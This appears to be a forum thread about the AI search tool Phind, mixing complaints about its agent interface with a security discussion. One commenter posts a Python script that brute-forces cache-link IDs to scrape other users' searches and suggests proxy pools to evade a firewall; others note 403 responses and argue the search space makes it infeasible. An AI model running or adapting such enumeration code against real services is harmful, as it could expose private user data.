Wiping these pages would not be good from the preservation standpoint, especially since the URL doesn't seem human-readable.
But to be fair, it feels way worse to use now than when it came out, so I guess I won't lose much by switching away at this point.
I hate this thing assuming it knows what I want.
Previously it had predictable behaviour, and acted like a slow LLM powered search engine.
Now I do a search and it starts asking me shit. I already tabbed away to three other places to do similar searches and come back to some half baked shit that has nothing to do with what I searched for. Plus I have to wait for it to go and do inference again before I can get to a link?
Why forget all the things that search engines got right over the years, but keep all the shit they got wrong?
https://www.phind.com/agent?cache=cll1bg5np0005l008molmt7d2
import random
import string
import requests
# Static prefix
prefix = "cll1"
# An empty set to store the cache links we've already tried
tried_links = set()
# Website URL
url = "http://target.com/agent?cache="
# Dictionary to store cachelink and its response text
cache_link_dict = {}
while True:
# Generate a random 21 character base 36 encoded string
suffix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=21))
# Combine the prefix and suffix to create the cache link
cache_link = prefix + suffix
# Continue with a new loop iteration if we've already tried this link
if cache_link in tried_links:
continue
# Add the cache link to our set of tried links
tried_links.add(cache_link)
# Make a request to the website with the cache link
response = requests.get(url + cache_link)
# Store the cachelink and its response text in the dictionary
cache_link_dict[cache_link] = response.text
# Add a delay between requests to avoid overwhelming the server
time.sleep(1)
So it took 17 minutes to use your website to create the code needed to start enumerating these links.Now given, I am pretty sure a large number of these will return nothing, but I am also willing to bet there are people that put GDPR data into these searches, perhaps a lookup of a phone number, or an address, names?
It would be quite trivial adding in the code to run these requests through a pool of proxies so they don't trigger anything too suspicious on your WAF.
I don't think I'm particularly skilled either, so if I can do this, I'm sure someone already has.
It beat ChatGPT every time simply because it unlocked a portion of ChatGPT locked down by the knowledge cutoff. It was also quite speedy, and even the way it resists going into infinite loops was much better than ChatGPT at the time.
I assumed my data might be used to train AI in an obtuse obfuscated kinda way, but I never would have imagined I could just brute-force cache links.
I am now only sleep deprived. I still use phind, and just came back here to say sorry to whoever, since it really does help me with productivity.
Also, it will require more time to reverse engineer the cache links, and I don't want to spend more time.
First all the requests return 403 so think there will need to be a selenium component (user-agent trickery is not sufficient).
Assuming theres 100 billion valid links and someones scanning 1mil links per second, they'd still be averaging 1 discovered link per million years.